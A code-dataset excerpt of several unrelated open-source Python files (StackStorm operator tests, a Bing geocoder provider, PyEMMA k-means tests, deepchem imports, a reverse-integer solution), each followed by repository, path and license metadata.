# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest2
from st2common import operators
from st2common.util import date as date_utils
class OperatorTest(unittest2.TestCase):
    """Unit tests for the criteria comparison operators in st2common.operators.

    Each test fetches an operator implementation via get_operator() and
    checks its truth value for representative positive and negative inputs.

    Fix: test_gt_str previously fetched the 'lessthan' operator (copy-paste
    bug -- its name and failure message both refer to greaterthan); it now
    exercises 'greaterthan' with correspondingly ordered operands.
    """

    def test_matchwildcard(self):
        op = operators.get_operator('matchwildcard')
        self.assertTrue(op('v1', 'v1'), 'Failed matchwildcard.')
        self.assertFalse(op('test foo test', 'foo'), 'Failed matchwildcard.')
        self.assertTrue(op('test foo test', '*foo*'), 'Failed matchwildcard.')
        self.assertTrue(op('bar', 'b*r'), 'Failed matchwildcard.')
        self.assertTrue(op('bar', 'b?r'), 'Failed matchwildcard.')

    def test_matchregex(self):
        op = operators.get_operator('matchregex')
        self.assertTrue(op('v1', 'v1$'), 'Failed matchregex.')
        # Multi line string, make sure re.DOTALL is used
        string = '''ponies
moar
foo
bar
yeah!
'''
        self.assertTrue(op(string, '.*bar.*'), 'Failed matchregex.')
        string = 'foo\r\nponies\nbar\nfooooo'
        self.assertTrue(op(string, '.*ponies.*'), 'Failed matchregex.')

    def test_matchregex_case_variants(self):
        # Operator lookup is case-insensitive.
        op = operators.get_operator('MATCHREGEX')
        self.assertTrue(op('v1', 'v1$'), 'Failed matchregex.')
        op = operators.get_operator('MATCHregex')
        self.assertTrue(op('v1', 'v1$'), 'Failed matchregex.')

    def test_matchregex_fail(self):
        op = operators.get_operator('matchregex')
        self.assertFalse(op('v1_foo', 'v1$'), 'Passed matchregex.')

    def test_equals_numeric(self):
        op = operators.get_operator('equals')
        self.assertTrue(op(1, 1), 'Failed equals.')

    def test_equals_string(self):
        op = operators.get_operator('equals')
        self.assertTrue(op('1', '1'), 'Failed equals.')
        self.assertTrue(op('', ''), 'Failed equals.')

    def test_equals_fail(self):
        op = operators.get_operator('equals')
        self.assertFalse(op('1', '2'), 'Passed equals.')

    def test_nequals(self):
        op = operators.get_operator('nequals')
        self.assertTrue(op('foo', 'bar'))
        self.assertTrue(op('foo', 'foo1'))
        self.assertTrue(op('foo', 'FOO'))
        self.assertTrue(op('True', True))
        self.assertTrue(op('None', None))
        self.assertFalse(op('True', 'True'))
        self.assertFalse(op(None, None))

    def test_iequals(self):
        op = operators.get_operator('iequals')
        self.assertTrue(op('ABC', 'ABC'), 'Failed iequals.')
        self.assertTrue(op('ABC', 'abc'), 'Failed iequals.')
        self.assertTrue(op('AbC', 'aBc'), 'Failed iequals.')

    def test_iequals_fail(self):
        op = operators.get_operator('iequals')
        self.assertFalse(op('ABC', 'BCA'), 'Failed iequals.')

    def test_contains(self):
        op = operators.get_operator('contains')
        self.assertTrue(op('hasystack needle haystack', 'needle'))
        self.assertTrue(op('needle', 'needle'))
        self.assertTrue(op('needlehaystack', 'needle'))
        self.assertTrue(op('needle haystack', 'needle'))
        self.assertTrue(op('haystackneedle', 'needle'))
        self.assertTrue(op('haystack needle', 'needle'))

    def test_contains_fail(self):
        op = operators.get_operator('contains')
        self.assertFalse(op('hasystack needl haystack', 'needle'))
        self.assertFalse(op('needla', 'needle'))

    def test_icontains(self):
        op = operators.get_operator('icontains')
        self.assertTrue(op('hasystack nEEdle haystack', 'needle'))
        self.assertTrue(op('neeDle', 'NeedlE'))
        self.assertTrue(op('needlehaystack', 'needle'))
        self.assertTrue(op('NEEDLE haystack', 'NEEDLE'))
        self.assertTrue(op('haystackNEEDLE', 'needle'))
        self.assertTrue(op('haystack needle', 'NEEDLE'))

    def test_icontains_fail(self):
        op = operators.get_operator('icontains')
        self.assertFalse(op('hasystack needl haystack', 'needle'))
        self.assertFalse(op('needla', 'needle'))

    def test_ncontains(self):
        op = operators.get_operator('ncontains')
        self.assertTrue(op('hasystack needle haystack', 'foo'))
        self.assertTrue(op('needle', 'foo'))
        self.assertTrue(op('needlehaystack', 'needlex'))
        self.assertTrue(op('needle haystack', 'needlex'))
        self.assertTrue(op('haystackneedle', 'needlex'))
        self.assertTrue(op('haystack needle', 'needlex'))

    def test_ncontains_fail(self):
        op = operators.get_operator('ncontains')
        self.assertFalse(op('hasystack needle haystack', 'needle'))
        self.assertFalse(op('needla', 'needla'))

    def test_incontains(self):
        op = operators.get_operator('incontains')
        self.assertTrue(op('hasystack needle haystack', 'FOO'))
        self.assertTrue(op('needle', 'FOO'))
        self.assertTrue(op('needlehaystack', 'needlex'))
        self.assertTrue(op('needle haystack', 'needlex'))
        self.assertTrue(op('haystackneedle', 'needlex'))
        self.assertTrue(op('haystack needle', 'needlex'))

    def test_incontains_fail(self):
        op = operators.get_operator('incontains')
        self.assertFalse(op('hasystack needle haystack', 'nEeDle'))
        self.assertFalse(op('needlA', 'needlA'))

    def test_startswith(self):
        op = operators.get_operator('startswith')
        self.assertTrue(op('hasystack needle haystack', 'hasystack'))
        self.assertTrue(op('a hasystack needle haystack', 'a '))

    def test_startswith_fail(self):
        op = operators.get_operator('startswith')
        self.assertFalse(op('hasystack needle haystack', 'needle'))
        self.assertFalse(op('a hasystack needle haystack', 'haystack'))

    def test_istartswith(self):
        op = operators.get_operator('istartswith')
        self.assertTrue(op('haystack needle haystack', 'HAYstack'))
        self.assertTrue(op('HAYSTACK needle haystack', 'haystack'))

    def test_istartswith_fail(self):
        op = operators.get_operator('istartswith')
        self.assertFalse(op('hasystack needle haystack', 'NEEDLE'))
        self.assertFalse(op('a hasystack needle haystack', 'haystack'))

    def test_endswith(self):
        op = operators.get_operator('endswith')
        self.assertTrue(op('hasystack needle haystackend', 'haystackend'))
        self.assertTrue(op('a hasystack needle haystack b', 'b'))

    def test_endswith_fail(self):
        op = operators.get_operator('endswith')
        self.assertFalse(op('hasystack needle haystackend', 'haystack'))
        self.assertFalse(op('a hasystack needle haystack', 'a'))

    def test_iendswith(self):
        op = operators.get_operator('iendswith')
        self.assertTrue(op('haystack needle haystackEND', 'HAYstackend'))
        self.assertTrue(op('HAYSTACK needle haystackend', 'haystackEND'))

    def test_iendswith_fail(self):
        op = operators.get_operator('iendswith')
        self.assertFalse(op('hasystack needle haystack', 'NEEDLE'))
        self.assertFalse(op('a hasystack needle haystack', 'a '))

    def test_lt(self):
        op = operators.get_operator('lessthan')
        self.assertTrue(op(1, 2), 'Failed lessthan.')

    def test_lt_char(self):
        op = operators.get_operator('lessthan')
        self.assertTrue(op('a', 'b'), 'Failed lessthan.')

    def test_lt_fail(self):
        op = operators.get_operator('lessthan')
        self.assertFalse(op(1, 1), 'Passed lessthan.')

    def test_gt(self):
        op = operators.get_operator('greaterthan')
        self.assertTrue(op(2, 1), 'Failed greaterthan.')

    def test_gt_str(self):
        # BUG FIX: this test used to fetch 'lessthan' even though it is the
        # string variant of the greaterthan tests.
        op = operators.get_operator('greaterthan')
        self.assertTrue(op('bcb', 'aba'), 'Failed greaterthan.')

    def test_gt_fail(self):
        op = operators.get_operator('greaterthan')
        self.assertFalse(op(2, 3), 'Passed greaterthan.')

    def test_timediff_lt(self):
        op = operators.get_operator('timediff_lt')
        self.assertTrue(op(date_utils.get_datetime_utc_now().isoformat(), 10),
                        'Failed test_timediff_lt.')

    def test_timediff_lt_fail(self):
        op = operators.get_operator('timediff_lt')
        self.assertFalse(op('2014-07-01T00:01:01.000000', 10),
                         'Passed test_timediff_lt.')

    def test_timediff_gt(self):
        op = operators.get_operator('timediff_gt')
        self.assertTrue(op('2014-07-01T00:01:01.000000', 1),
                        'Failed test_timediff_gt.')

    def test_timediff_gt_fail(self):
        op = operators.get_operator('timediff_gt')
        self.assertFalse(op(date_utils.get_datetime_utc_now().isoformat(), 10),
                         'Passed test_timediff_gt.')

    def test_exists(self):
        op = operators.get_operator('exists')
        self.assertTrue(op(False, None), 'Should return True')
        self.assertTrue(op(1, None), 'Should return True')
        self.assertTrue(op('foo', None), 'Should return True')
        self.assertFalse(op(None, None), 'Should return False')

    def test_nexists(self):
        op = operators.get_operator('nexists')
        self.assertFalse(op(False, None), 'Should return False')
        self.assertFalse(op(1, None), 'Should return False')
        self.assertFalse(op('foo', None), 'Should return False')
        self.assertTrue(op(None, None), 'Should return True')
|
dennybaa/st2
|
st2common/tests/unit/test_operators.py
|
Python
|
apache-2.0
| 10,068
|
#!/usr/bin/python
# coding: utf8
from __future__ import absolute_import
from geocoder.base import Base
from geocoder.keys import bing_key
import re
class Bing(Base):
    """
    Bing Maps REST Services
    =======================
    The Bing™ Maps REST Services Application Programming Interface (API)
    provides a Representational State Transfer (REST) interface to
    perform tasks such as creating a static map with pushpins, geocoding
    an address, retrieving imagery metadata, or creating a route.

    API Reference
    -------------
    http://msdn.microsoft.com/en-us/library/ff701714.aspx

    Get Bing key
    ------------
    https://www.bingmapsportal.com/

    Fix: in ``housenumber``, ``re.UNICODE`` was previously passed as the
    ``pos`` argument of ``Pattern.search()`` (its value, 32, made the scan
    start at index 32, missing the number in any short street line); the
    flag now goes to ``re.compile()`` where it belongs.
    """
    provider = 'bing'
    method = 'geocode'

    def __init__(self, location, **kwargs):
        """
        Arguments:
            location (str): free-form address or place query.
            **kwargs: forwarded to the Base provider machinery; may carry
                the API key override.
        """
        self.url = 'http://dev.virtualearth.net/REST/v1/Locations'
        self.location = location
        self.headers = {
            'Referer': "http://addxy.com/",
            'User-agent': 'Mozilla/5.0'
        }
        self.params = {
            'q': location,
            'o': 'json',
            'inclnb': 1,
            'key': self._get_api_key(bing_key, **kwargs),
            'maxResults': 1
        }
        self._initialize(**kwargs)

    def _catch_errors(self):
        # Any status other than 'OK' is surfaced as the provider error.
        status = self.parse['statusDescription']
        if status != 'OK':
            self.error = status

    def _exceptions(self):
        # Build intial Tree with results
        sets = self.parse['resourceSets']
        if sets:
            resources = sets[0]['resources']
            if resources:
                self._build_tree(resources[0])
                for item in self.parse['geocodePoints']:
                    self._build_tree(item)

    @property
    def lat(self):
        """Latitude of the geocode point, if any."""
        coord = self.parse['point']['coordinates']
        if coord:
            return coord[0]

    @property
    def lng(self):
        """Longitude of the geocode point, if any."""
        coord = self.parse['point']['coordinates']
        if coord:
            return coord[1]

    @property
    def address(self):
        return self.parse['address'].get('formattedAddress')

    @property
    def housenumber(self):
        """First run of digits in the street line, taken as the number."""
        if self.street:
            # Flag belongs to compile(); the second positional argument of
            # Pattern.search() is a start offset, not a flags mask.
            pattern = re.compile(r'\d+', re.UNICODE)
            match = pattern.search(self.street)
            if match:
                return match.group(0)

    @property
    def street(self):
        return self.parse['address'].get('addressLine')

    @property
    def neighborhood(self):
        return self.parse['address'].get('neighborhood')

    @property
    def city(self):
        return self.parse['address'].get('locality')

    @property
    def state(self):
        return self.parse['address'].get('adminDistrict')

    @property
    def country(self):
        return self.parse['address'].get('countryRegion')

    @property
    def quality(self):
        return self.parse.get('entityType')

    @property
    def accuracy(self):
        return self.parse.get('calculationMethod')

    @property
    def postal(self):
        return self.parse['address'].get('postalCode')

    @property
    def bbox(self):
        """Bounding box as (south, west, north, east), if provided."""
        if self.parse['bbox']:
            south = self.parse['bbox'][0]
            north = self.parse['bbox'][2]
            west = self.parse['bbox'][1]
            east = self.parse['bbox'][3]
            return self._get_bbox(south, west, north, east)
if __name__ == '__main__':
    # Ad-hoc manual check: geocode a sample address and dump the result.
    g = Bing('453 Booth Street, Ottawa Ontario')
    g.debug()
|
akittas/geocoder
|
geocoder/bing.py
|
Python
|
mit
| 3,453
|
# Package metadata for SpiderKeeper.
__version__ = '1.2.0'
__author__ = 'Dormy Mo'
|
DormyMo/SpiderKeeper
|
SpiderKeeper/__init__.py
|
Python
|
mit
| 46
|
from __future__ import absolute_import
import unittest
from unittest import TestCase
import numpy as np
from pyemma.coordinates.api import cluster_mini_batch_kmeans
class TestMiniBatchKmeans(TestCase):
    """Sanity checks for cluster_mini_batch_kmeans on 3-mode Gaussian data.

    The assertions only verify that cluster centers land near each of the
    three modes (around -2, 0 and +2), not exact cluster assignments.
    """
    def test_3gaussian_1d_singletraj(self):
        # generate 1D data from three gaussians
        X = [np.random.randn(200) - 2.0,
             np.random.randn(300),
             np.random.randn(400) + 2.0]
        X = np.hstack(X)
        kmeans = cluster_mini_batch_kmeans(X, batch_size=0.5, k=100, max_iter=10000)
        cc = kmeans.clustercenters
        assert (np.any(cc < 1.0))
        assert (np.any((cc > -1.0) * (cc < 1.0)))
        assert (np.any(cc > -1.0))
    def test_3gaussian_2d_multitraj(self):
        # generate 2D data (only the x-axis is informative) from three
        # gaussians, split across three separate trajectories
        X1 = np.zeros((200, 2))
        X1[:, 0] = np.random.randn(200) - 2.0
        X2 = np.zeros((300, 2))
        X2[:, 0] = np.random.randn(300)
        X3 = np.zeros((400, 2))
        X3[:, 0] = np.random.randn(400) + 2.0
        X = [X1, X2, X3]
        kmeans = cluster_mini_batch_kmeans(X, batch_size=0.5, k=100, max_iter=10000)
        cc = kmeans.clustercenters
        assert (np.any(cc < 1.0))
        assert (np.any((cc > -1.0) * (cc < 1.0)))
        assert (np.any(cc > -1.0))
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
|
trendelkampschroer/PyEMMA
|
pyemma/coordinates/tests/test_mini_batch_kmeans.py
|
Python
|
bsd-2-clause
| 1,309
|
"""
Imports all submodules
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
from deepchem.dock.pose_generation import PoseGenerator
from deepchem.dock.pose_generation import VinaPoseGenerator
from deepchem.dock.pose_scoring import PoseScorer
from deepchem.dock.pose_scoring import GridPoseScorer
from deepchem.dock.docking import Docker
from deepchem.dock.docking import VinaGridRFDocker
from deepchem.dock.docking import VinaGridDNNDocker
from deepchem.dock.binding_pocket import ConvexHullPocketFinder
from deepchem.dock.binding_pocket import RFConvexHullPocketFinder
|
bowenliu16/deepchem
|
deepchem/dock/__init__.py
|
Python
|
gpl-3.0
| 637
|
"""
Reverse digits of an integer.
Example1: x = 123, return 321
Example2: x = -123, return -321
click to show spoilers.
Have you thought about this?
Here are some good questions to ask before coding. Bonus points for you if you
have already thought through this!
If the integer's last digit is 0, what should the output be? ie, cases such as
10, 100.
Did you notice that the reversed integer might overflow? Assume the input is a
32-bit integer, then the reverse of 1000000003 overflows. How should you
handle such cases?
For the purpose of this problem, assume that your function returns 0 when
the reversed integer overflows.
"""
class Solution:
    # @param {integer} x
    # @return {integer}
    def reverse(self, x):
        """Reverse the decimal digits of x, preserving the sign.

        Per the problem statement above, the input is assumed to be a
        32-bit signed integer and 0 is returned when the reversed value
        overflows that range -- the original code never checked this.
        Trailing zeros drop out naturally (120 -> 21).
        """
        if 0 <= x < 10:
            # Single non-negative digit: nothing to reverse.
            return x
        sign = -1 if x < 0 else 1
        # int() discards any leading zeros produced by the reversal.
        result = sign * int(str(abs(x))[::-1])
        # Overflow rule: reversed value must fit in a signed 32-bit int.
        if result < -2 ** 31 or result > 2 ** 31 - 1:
            return 0
        return result
|
fantuanmianshi/Daily
|
LeetCode/reverse_integer.py
|
Python
|
mit
| 970
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.